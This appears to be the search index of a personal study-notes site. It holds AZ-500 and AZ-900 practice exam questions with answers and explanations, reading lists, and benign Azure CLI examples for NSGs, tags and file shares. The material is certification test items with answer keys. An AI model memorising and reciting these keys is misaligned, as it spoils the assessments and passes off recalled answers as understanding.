Your company has an Azure subscription named Subscription1. Subscription1 is associated with the Azure Active Directory tenant that includes the following users:

• User1: Global Administrator
• User2: Billing Administrator
• User3: Owner
• User4: Account Admin

The company is sold to a new owner. The company needs to transfer ownership of Subscription1. Which user can transfer the ownership, and which tool should the user use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

                            Select user:

                            • User1
                            • User2
                            • User3
                            • User4

                            Select tool:

                            • Azure Account Center
                            • Azure Cloud Shell
                            • Azure PowerShell
                            • Azure Security Center
                            See response

                            User1. Azure Account Center.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-96","title":"Question 96","text":"

The CIS Microsoft Azure Foundations Security Benchmark provides several recommended best practices related to identity and access management. Each of the following is a best practice except which one?

                            • Avoid unnecessary guest user accounts in Azure Active Directory.
• Enable Azure Multi-Factor Authentication (MFA).
                            • Establish intervals for reviewing user authentication methods.
                            • Enable Self-Service Group Management.
                            See response

                            Enable Self-Service Group Management.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-97","title":"Question 97","text":"

You have an Azure Active Directory (Azure AD) tenant that contains the following users:

• User1: member of Group1 and Group2; MFA status: Enabled
• User2: member of Group1; MFA status: Disabled

                            You create and enforce an Azure AD Identity Protection sign-in risk policy that has the following settings:

• Assignments: Include Group1, exclude Group2
                            • Conditions: Sign-in risk level: Low and above
                            • Access: Allow access, Require multi-factor authentication.

You need to identify what occurs when the users sign in to Azure AD. What should you identify for each user? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

                            When User1 signs in from an anonymous IP address, the user will:

                            • Be blocked.
                            • Be prompted for MFA.
                            • Sign in by using a username and password only.

                            When User2 signs in from an unfamiliar location, the user will:

                            • Be blocked.
                            • Be prompted for MFA.
                            • Sign in by using a username and password only.
                            See response

User1 will be prompted for MFA. User2 will be blocked. User1 is excluded from the sign-in risk policy through Group2, but per-user MFA is enabled, so the user is still prompted for MFA. The policy applies to User2 and requires MFA, which User2 has disabled, so the sign-in is blocked.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-98","title":"Question 98","text":"

You have an Azure subscription that contains the following virtual machines:

• VM1: East US, VNet1
• VM2: West US, VNet2
• VM3: East US, VNet1
• VM4: West US, VNet3

                            All the virtual networks are peered. You deploy Azure Bastion to VNet2. Which virtual machines can be protected by the bastion host?

                            • VM1, VM2, VM3, and VM4.
                            • VM1, VM2, and VM3 only.
                            • VM2 and VM4 only.
                            • VM2 only.
                            See response

                            VM1, VM2, VM3, and VM4.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-99","title":"Question 99","text":"

You have an Azure subscription that contains the following Azure virtual machines:

• VM1: Windows 10
• VM2: Windows Server 2016
• VM3: Windows Server 2019
• VM4: Ubuntu Server 18.04 LTS

                            You create an MDM Security Baseline profile named Profile1. You need to identify to which virtual machines Profile1 can be applied. Which virtual machines should you identify?

                            • VM1, VM2, VM3, and VM4.
                            • VM1, VM2, and VM3 only.
                            • VM1 and VM3 only.
                            • VM1 only.
                            See response

                            VM1 only.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-100","title":"Question 100","text":"

You have an Azure subscription named Sub1. You create a virtual network that contains one subnet. On the subnet, you provision the following virtual machines:

• VM1: NIC1, application security group Appgroup12, IP address 10.0.0.10
• VM2: NIC2, application security group Appgroup12, IP address 10.0.0.11
• VM3: NIC3, application security group Appgroup3, IP address 10.0.0.100
• VM4: NIC4, application security group Appgroup4, IP address 10.0.0.200

                            Currently, you have not provisioned any network security groups (NSGs). You need to implement network security to meet the following requirements:

                            • Allow traffic to VM4 from VM3 only.
                            • Allow traffic from the Internet to VM1 and VM2.
                            • Minimize the number of NSGs and network security rules.

                            How many NSGs and network security rules should you create? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

                            NSGs:

                            • 1
                            • 2
                            • 3
                            • 4

                            Network security rules:

                            • 1
                            • 2
                            • 3
                            • 4
                            See response

                            NSGs: 2. Network security rules: 3.
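                            A hedged Azure CLI sketch of what those rules could look like, using the application security groups from the table (the NSG names, priorities, and resource group are illustrative assumptions):

                            ```
                            # NSG 1: allow inbound traffic from the Internet to VM1 and VM2 (Appgroup12)
                            az network nsg create --resource-group rg1 --name nsg-internet
                            az network nsg rule create --resource-group rg1 --nsg-name nsg-internet --name AllowInternetToAppgroup12 --priority 100 --direction Inbound --access Allow --source-address-prefixes Internet --destination-asgs Appgroup12 --destination-port-ranges '*' --protocol '*'

                            # NSG 2: allow VM3 (Appgroup3) to reach VM4 (Appgroup4), then deny everything else to VM4
                            az network nsg create --resource-group rg1 --name nsg-vm4
                            az network nsg rule create --resource-group rg1 --nsg-name nsg-vm4 --name AllowAppgroup3ToAppgroup4 --priority 100 --direction Inbound --access Allow --source-asgs Appgroup3 --destination-asgs Appgroup4 --destination-port-ranges '*' --protocol '*'
                            az network nsg rule create --resource-group rg1 --nsg-name nsg-vm4 --name DenyAllToAppgroup4 --priority 200 --direction Inbound --access Deny --source-address-prefixes '*' --destination-asgs Appgroup4 --destination-port-ranges '*' --protocol '*'
                            ```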

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-keep-learning/","title":"AZ-500 Microsoft Azure Security Technologies Certificate - keep learning","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-keep-learning/#az-500-microsoft-azure-security-technologies-certificate-keep-learning","title":"AZ-500 Microsoft Azure Security Technologies Certificate: keep learning","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500\".
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            In addition to completing the course work in the AZ-500 learning path, you should also be sure to read the following reference articles from Microsoft:

                            • Manage Azure Active Directory groups and group membership
                            • Configure Microsoft Entra Verified ID verifier
                            • Block legacy authentication with Azure AD with Conditional Access
                            • Microsoft Entra Permissions Management
                            • What are access reviews?
                            • Register an app with Azure Active Directory
                            • Application and service principal objects in Azure Active Directory
                            • Virtual network traffic routing
                            • Azure SQL Database and Azure Synapse IP firewall rules
                            • Networking considerations for App Service Environment
                            • Create a virtual network for Azure SQL Managed Instance
                            • Add and manage TLS/SSL certificates in Azure App Service
                            • Observability in Azure Container Apps
                            • Choose how to authorize access to blob data in the Azure portal
                            • Authorize access to tables using Azure Active Directory
                            • Choose how to authorize access to queue data in the Azure portal
                            • Configure immutability policies for blob versions
                            • Bring your own key details for Azure Information Protection
                            • Enable infrastructure encryption for double encryption of data
                            • Define and assign a blueprint in the portal
                            • What is an Azure landing zone?
                            • Dedicated HSM FAQ
                            • Improve your regulatory compliance
                            • Customize the set of standards in your regulatory compliance dashboard
                            • Create custom Azure security initiatives and policies
                            • Plan your Defender for Servers deployment
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-preparation/","title":"AZ-500 Azure Security Engineer: Notes on the certification","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500\".
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            These are some of the requirements for facing the AZ-500, as highlighted by some experts:

                            • Have previously taken the Azure Administrator: AZ-103/104 course.
                            • A minimum of 1 year experience with Azure.
                            • Understand concepts of virtual machines, resource groups and Azure AD.

                            Since I only had two vouchers for Azure certifications in 2023 and had already spent one on the AZ-900, I focused on the AZ-500, but first I completed the AZ-104 training. These are my notes from that non-certificated AZ-104 learning.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-preparation/#differences-between-the-az-500-and-the-sc-900-certification","title":"Differences between the AZ-500 and the SC-900 certification","text":"

                            The Exam AZ-500: Microsoft Azure Security Technologies focuses on how an Azure Security Engineer implements, manages, and monitors security for resources in Azure, multi-cloud, and hybrid environments as part of an end-to-end infrastructure. This certification covers the security components and configurations that protect identity & access, data, applications, and networks.

                            The Exam SC-900: Microsoft Security, Compliance, and Identity Fundamentals, in contrast, is targeted at those looking to familiarize themselves with the fundamentals of security, compliance, and identity (SCI) across cloud-based and related Microsoft services. This is a broad audience that may include business stakeholders, new or existing IT professionals, and students with an interest in Microsoft security, compliance, and identity solutions.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-900-exams/","title":"Exams - Practice the AZ-900","text":"

                            Both The AZ-900: Notes to get through the Azure Fundamentals Certificate and these practice exams are derived from different sources.

                            • Notes taken in: September 2023.
                            • Certification accomplished on: September 23rd, 2023.
                            • Practice tests: compiled from different sources.
                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#microsoft-platform","title":"Microsoft platform","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#practice-assessment-1","title":"Practice assessment 1","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-of-50","title":"Question 1 of 50","text":"

                            Why is cloud computing often less expensive than on-premises datacenters? Each correct answer presents a complete solution.

                            • You are only billed for what you use.

                            Renting compute and storage services and being billed for only what you use often lowers operating expenses. Depending on the service and the type of network bandwidth, charges can be incurred. Cloud service offerings often provide functionality that can be difficult or cost-prohibitive to deploy on-premises, especially for smaller organizations. Major cloud providers offer services around the world, making it easy and relatively inexpensive to deploy services close to where your users reside. Describe cloud computing - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-of-50","title":"Question 2 of 50","text":"

                            Select the answer that correctly completes the sentence. (------Your Answer Here -------)\u00a0refers to upfront costs incurred one time, such as hardware purchases.

                            • Capital expenditures

                            Capital expenditures are one-time expenses that can be deducted over time. Operational expenditures are billed as you use services and do not have upfront costs.

                            Describe cloud computing - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-of-50","title":"Question 3 of 50","text":"

                            Which cloud deployment model are you using if you have servers physically located at your organization\u2019s on-site datacenter, and you migrate a few of the servers to the cloud?

                            • hybrid cloud

                            A hybrid cloud is a computing environment that combines a public cloud and a private cloud by allowing data and applications to be shared between them.

                            Describe cloud computing - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-of-50","title":"Question 4 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            Increasing compute capacity for an app by adding RAM or CPUs to a virtual machine is called\u00a0(------Your Answer Here -------).

                            • vertical scaling

                            You scale vertically to increase compute capacity by adding RAM or CPUs to a virtual machine. Scaling horizontally increases compute capacity by adding instances of resources, such as adding virtual machines to the configuration. Disaster recovery keeps data and other assets safe in the event of a disaster. High availability minimizes downtime when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-5-of-50","title":"Question 5 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            Deploying and configuring cloud-based resources quickly as business requirements change is called\u00a0(------Your Answer Here -------).

                            • agility

                            Agility means that you can deploy and configure cloud-based resources quickly as app requirements change. Scalability means that you can add RAM, CPU, or entire virtual machines to a configuration. Elasticity means that you can configure cloud-based apps to take advantage of autoscaling, so apps always have the resources they need. High availability means that cloud-based apps can provide a continuous user experience with no apparent downtime, even when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-6-of-50","title":"Question 6 of 50","text":"

                            What are cloud-based backup services, data replication, and geo-distribution features of?

                            • a disaster recovery plan

                            Disaster recovery uses services, such as cloud-based backup, data replication, and geo-distribution, to keep data and code safe in the event of a disaster. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-7-of-50","title":"Question 7 of 50","text":"

                            What is high availability in a public cloud environment dependent on?

                            • the service-level agreement (SLA) that you choose

                            Different services have different SLAs. Sometimes different tiers of the same service will offer different SLAs, which can increase or decrease the promised availability. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-of-50","title":"Question 8 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            An example of\u00a0(------Your Answer Here -------)\u00a0is automatically scaling an application to ensure that the application has the resources needed to meet customer demands.

                            • elasticity

                            Elasticity refers to the ability to scale resources as needed, such as during business hours, to ensure that an application can keep up with demand, and then reducing the available resources during off-peak hours. Agility refers to the ability to deploy new applications and services quickly. High availability refers to the ability to ensure that a service or application remains available in the event of a failure. Geo-distribution makes a service or application available in multiple geographic locations that are typically close to your users. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-of-50","title":"Question 9 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            Increasing the capacity of an application by adding additional virtual machine is called\u00a0(------Your Answer Here -------).

                            • horizontal scaling

                            Scaling horizontally increases compute capacity by adding instances of resources, such as adding virtual machines to the configuration. You scale vertically to increase compute capacity by adding RAM or CPUs to a virtual machine. Agility refers to the ability to deploy new applications and services quickly. High availability minimizes downtime when things go wrong. Describe the benefits of using cloud services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-of-50","title":"Question 10 of 50","text":"

                            In a platform as a service (PaaS) model, which two components are the responsibility of the cloud service provider? Each correct answer presents a complete solution.

                            • operating system
                            • physical network

                            In PaaS, the cloud provider is responsible for the operating system, physical datacenter, physical hosts, and physical network. In PaaS, the customer is responsible for accounts and identities. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-of-50","title":"Question 11 of 50","text":"

                            Which type of cloud service model is typically licensed through a monthly or annual subscription?

                            • software as a service (SaaS)

                            SaaS is software that is centrally hosted and managed for you and your users or customers. Usually, one version of the application is used for all customers, and it is licensed through a monthly or annual subscription. PaaS and IaaS use a consumption-based model, so you only pay for what you use. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-of-50","title":"Question 12 of 50","text":"

                            In which cloud service model is the customer responsible for managing the operating system?

                            • Infrastructure as a service (IaaS)

                            IaaS consists of virtual machines and networking provided by the cloud provider. The customer is responsible for the OS and applications. The cloud provider is responsible for the OS in PaaS and SaaS. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-of-50","title":"Question 13 of 50","text":"

                            What is the customer responsible for in a software as a service (SaaS) model?

                            • data and access

                            SaaS allows you to pay to use an existing application on hardware managed by a third party. You supply data and configure access. Customers are only responsible for storage in a private cloud. Customers are responsible for virtual machines and runtime in IaaS and the private cloud. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-of-50","title":"Question 14 of 50","text":"

                            What uses the infrastructure as a service (IaaS) cloud service model?

                            • Azure virtual machines

                            Azure Virtual Machines is an IaaS offering. The customer is responsible for the configuration of the virtual machine as well as all operating system configurations. Azure App Services and Azure Cosmos DB are PaaS offerings. Microsoft Office 365 is a SaaS offering. Describe cloud service types - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-of-50","title":"Question 15 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            (------Your Answer Here -------)\u00a0is the logical container used to combine and organize Azure resources.

                            • a resource group

                            Resources are combined into resource groups, which act as a logical container into which Azure resources like web apps, databases, and storage accounts, are deployed and managed. Describe the core architectural components of Azure - Training | Microsoft Learn
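                            For instance, a minimal Azure CLI sketch creating a resource group and deploying a resource into it (all names are illustrative):

                            ```
                            # Create the logical container
                            az group create --name rg-demo --location eastus

                            # Resources are then deployed into (and managed through) the group
                            az storage account create --name stdemo001 --resource-group rg-demo --sku Standard_LRS
                            ```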

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-of-50","title":"Question 16 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            In a region pair, a region is paired with another region in the same\u00a0(------Your Answer Here -------).

                            • geography

                            Each Azure region is always paired with another region within the same geography, such as US, Europe, or Asia, at least 300 miles away. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-of-50","title":"Question 17 of 50","text":"

                            What is an Azure Storage account named storage001 an example of?

                            • a resource

                            A resource is a manageable item that is available through Azure. Virtual machines, storage accounts, web apps, databases, and virtual networks are examples of resources. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-of-50","title":"Question 18 of 50","text":"

                            For which resource does Azure generate separate billing reports and invoices by default?

                            • subscriptions

                            Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs. Resource groups can be used to group costs, but you will not receive a separate invoice for each resource group. Management groups are used to efficiently manage access, policies, and compliance for subscriptions. You can set up billing profiles to roll up subscriptions into invoice sections, but this requires customization. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-of-50","title":"Question 19 of 50","text":"

                            Which resource can you use to manage access, policies, and compliance across multiple subscriptions?

                            • management groups

                            Management groups can be used in environments that have multiple subscriptions to streamline the application of governance conditions. Resource groups can be used to organize Azure resources. Administrative units are used to delegate the administration of Azure AD resources, such as users and groups. Accounts are used to provide access to resources.

                            Describe the core architectural components of Azure - Training | Microsoft Learn
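                            A minimal Azure CLI sketch (the management group name and subscription ID are placeholders):

                            ```
                            # Create a management group and move a subscription under it
                            az account management-group create --name corp-mg
                            az account management-group subscription add --name corp-mg --subscription <subscription-id>
                            ```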

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-of-50","title":"Question 20 of 50","text":"

                            Select the answer that correctly completes the sentence.

                            (------Your Answer Here -------)\u00a0is the deployment and management service for Azure.

                            • Azure Resource Manager (ARM)

                            ARM is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in an Azure subscription. You use management features, such as access control, resource locks, and resource tags, to secure and organize resources after deployment. Describe the core architectural components of Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-of-50","title":"Question 21 of 50","text":"

                            What can you use to execute code in a serverless environment?

                            • Azure Functions

                            Azure Functions allows you to run code as a service without having to manage the underlying platform or infrastructure. Azure Logic Apps is similar to Azure Functions, but uses predefined workflows instead of developing your own code. Describe Azure compute and networking services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-of-50","title":"Question 22 of 50","text":"

                            What can you use to connect Azure resources, such as Azure SQL databases, to an Azure virtual network?

                            • service endpoints

                            Service endpoints are used to expose Azure services to a virtual network, providing communication between the two. ExpressRoute is used to connect an on-premises network to Azure. NSGs allow you to configure inbound and outbound rules for virtual networks and virtual machines. Peering allows you to connect virtual networks together. Describe Azure compute and networking services - Training | Microsoft Learn
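                            For example, enabling a Microsoft.Sql service endpoint on a subnet with Azure CLI (the resource names are assumptions):

                            ```
                            # Expose Azure SQL to the subnet through a service endpoint
                            az network vnet subnet update --resource-group rg1 --vnet-name vnet1 --name subnet1 --service-endpoints Microsoft.Sql
                            ```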

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-of-50","title":"Question 23 of 50","text":"

                            Which two services can you use to establish network connectivity between an on-premises network and Azure resources? Each correct answer presents a complete solution.

                            • Azure VPN Gateway
                            • ExpressRoute

                            ExpressRoute connections and Azure VPN Gateway are two services that you can use to connect an on-premises network to Azure. Bastion provides a web interface to remotely administer Azure virtual machines by using SSH/RDP. Azure Firewall is a stateful firewall service used to protect virtual networks. Azure ExpressRoute: Connectivity models | Microsoft Learn. Describe Azure compute and networking services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-of-50","title":"Question 24 of 50","text":"

                            Which storage service should you use to store thousands of files containing text and images?

                            • Azure Blob storage

                            Azure Blob storage is an object storage solution that you can use to store massive amounts of unstructured data, such as text or binary data. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-of-50","title":"Question 25 of 50","text":"

                            Which Azure Blob storage tier stores data offline and offers the lowest storage costs and the highest costs to access data?

                            • Archive

                            The Archive storage tier stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data. The Hot storage tier is optimized for storing data that is accessed frequently. Data in the Cool access tier can tolerate slightly lower availability, but still requires high durability, retrieval latency, and throughput characteristics similar to hot data. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-of-50","title":"Question 26 of 50","text":"

                            Which storage service offers fully managed file shares in the cloud that are accessible by using Server Message Block (SMB) protocol?

                            • Azure Files

                            Azure Files offers fully managed file shares in the cloud with shares that are accessible by using Server Message Block (SMB) protocol. Mounting Azure file shares is just like connecting to shares on a local network. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-of-50","title":"Question 27 of 50","text":"

                            Which two scenarios are common use cases for Azure Blob storage? Each correct answer presents a complete solution.

                            • serving images or documents directly to a browser
                            • storing data for backup and restore

                            Low storage costs and unlimited file formats make blob storage a good location to store backups and archives. Blob storage can be reached from anywhere by using an internet connection. Azure Disk Storage provides disks for Azure virtual machines. Azure Files supports mounting file storage shares. Describe Azure storage services - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-of-50","title":"Question 28 of 50","text":"

                            Which Azure Blob storage service tier has the highest storage costs and the fastest access times for reading and writing data?

                            • Hot

                            The Hot tier is optimized for storing data that is accessed frequently. The Cool access tier has a slightly lower availability SLA and higher access costs compared to hot data, which are acceptable trade-offs for lower storage costs. Archive storage stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data. Describe Azure storage services - Training | Microsoft Learn
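                            Tiers are set per blob, so data can be demoted or rehydrated as its access pattern changes; a hedged Azure CLI example (account, container, and blob names are illustrative):

                            ```
                            # Demote a rarely read blob to the cheapest (offline) tier
                            az storage blob set-tier --account-name stdemo001 --container-name backups --name archive-2023.tar --tier Archive

                            # Rehydrating back to Hot can take hours and incurs read costs
                            az storage blob set-tier --account-name stdemo001 --container-name backups --name archive-2023.tar --tier Hot
                            ```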

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-of-50","title":"Question 29 of 50","text":"

                            Which two protocols are used to access Azure file shares? Each correct answer presents a complete solution.

                            • Network File System (NFS)
                            • Server Message Block (SMB)

                            Azure Files offers fully managed file shares in the cloud that are accessible via industry-standard SMB and NFS protocols. Describe Azure storage services - Training | Microsoft Learn
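                            Mounting an Azure file share over SMB from Linux works like any other SMB share; a sketch assuming a hypothetical storage account stdemo001 and a share named share1:

                            ```
                            # Mount an Azure Files share over SMB 3.1.1 (Linux)
                            sudo mkdir -p /mnt/share1
                            sudo mount -t cifs //stdemo001.file.core.windows.net/share1 /mnt/share1 -o vers=3.1.1,username=stdemo001,password=<storage-account-key>,serverino
                            ```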

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-of-50","title":"Question 30 of 50","text":"

                            What enables a user to sign in one time and use that credential to access multiple resources and applications from different providers?

                            • single sign-on (SSO)

                            SSO enables a user to sign in one time and use that credential to access multiple resources and applications from different providers. MFA is a process whereby a user is prompted during the sign-in process for an additional form of identification. Conditional Access is a tool that Azure AD uses to allow or deny access to resources based on identity signals. Azure AD supports the registration of devices. Describe Azure identity, access, and security - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-of-50","title":"Question 31 of 50","text":"

                            What can you use to allow a user to manage all the resources in a resource group?

                            • Azure role-based access control (RBAC)

                            Azure RBAC allows you to assign a set of permissions to a user or group. Resource tags are used to locate and act on resources associated with specific workloads, environments, business units, and owners. Resource locks prevent the accidental change or deletion of a resource. Key Vault is a centralized cloud service for storing an application secrets in a single, central location. Describe Azure identity, access, and security - Training | Microsoft Learn
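                            A hedged Azure CLI example granting a user the built-in Contributor role at resource-group scope (the user, subscription ID, and group name are placeholders):

                            ```
                            # Contributor at resource-group scope can manage all resources in the group
                            az role assignment create --assignee user@contoso.com --role "Contributor" --scope "/subscriptions/<subscription-id>/resourceGroups/rg-demo"
                            ```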

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-of-50","title":"Question 32 of 50","text":"

                            Which type of strategy uses a series of mechanisms to slow the advancement of an attack that aims to gain unauthorized access to data?

                            • defense in depth

                            A defense in depth strategy uses a series of mechanisms to slow the advancement of an attack that aims to gain unauthorized access to data. The principle of least privilege means restricting access to information to only the level that users need to perform their work. A DDoS attack attempts to overwhelm and exhaust an application's resources. The perimeter layer is about protecting an organization's resources from network-based attacks. Describe Azure identity, access, and security - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-of-50","title":"Question 33 of 50","text":"

                            Which two services are provided by Azure AD? Each correct answer presents a complete solution.

                            • authentication
                            • single sign-on (SSO)

                            Azure AD provides services for verifying identity and access to applications and resources. SSO enables you to remember a single username and password to access multiple applications and is available in Azure AD. Describe Azure identity, access, and security - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-of-50","title":"Question 34 of 50","text":"

                            You have an Azure virtual machine that is accessed only between 9:00 and 17:00 each day.

                            What should you do to minimize costs but preserve the associated hard disks and data?

                            • Resize the virtual machine. This answer is incorrect.

                            • Deallocate the virtual machine. This answer is correct.

                            If you have virtual machine workloads that are used only during certain periods but run them every hour of every day, you are wasting money. Such virtual machines are great candidates to deallocate when not in use and start back up when required, saving compute costs while they are deallocated. Describe cost management in Azure - Training | Microsoft Learn
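                            A sketch of that daily routine with Azure CLI (the resource names are illustrative); deallocating releases the compute hardware while keeping the disks:

                            ```
                            # Release compute at 17:00; disks and data are preserved
                            az vm deallocate --resource-group rg-demo --name vm1

                            # Bring the machine back at 9:00
                            az vm start --resource-group rg-demo --name vm1
                            ```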

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-of-50","title":"Question 35 of 50","text":"

                            You need to associate the costs of resources to different groups within an organization without changing the location of the resources. What should you use?

                            • subscriptions. This answer is incorrect.

                            • resource tags. This answer is correct.

                            Resource tags can be used to group billing data and categorize costs by runtime environment, such as billing usage for virtual machines running in a production environment. Tag resources, resource groups, and subscriptions for logical organization - Azure Resource Manager | Microsoft Learn. Describe the purpose of tags - Training | Microsoft Learn
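                            For example, attaching cost-attribution tags with Azure CLI (the tag names and resource ID are illustrative; note that this call replaces the resource's existing tags):

                            ```
                            # Tag a VM with its owning group without moving the resource
                            az resource tag --tags costCenter=finance owner=team-a --ids "/subscriptions/<subscription-id>/resourceGroups/rg-demo/providers/Microsoft.Compute/virtualMachines/vm1"
                            ```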

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-of-50","title":"Question 36 of 50","text":"

                            Your organization plans to deploy several production virtual machines that will have consistent resource usage throughout the year. What can you use to minimize the costs of the virtual machines without reducing the functionality of the virtual machines?

                            • Azure Reservations

                            Azure Reservations offers discounted prices on certain Azure services. Azure Reservations can save you up to 72 percent compared to pay-as-you-go prices. To receive a discount, you can reserve services and resources by paying in advance. Spending limits can suspend a subscription when the spend limit is reached. Describe cost management in Azure - Training | Microsoft Learn

                            ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-of-50","title":"Question 37 of 50","text":"

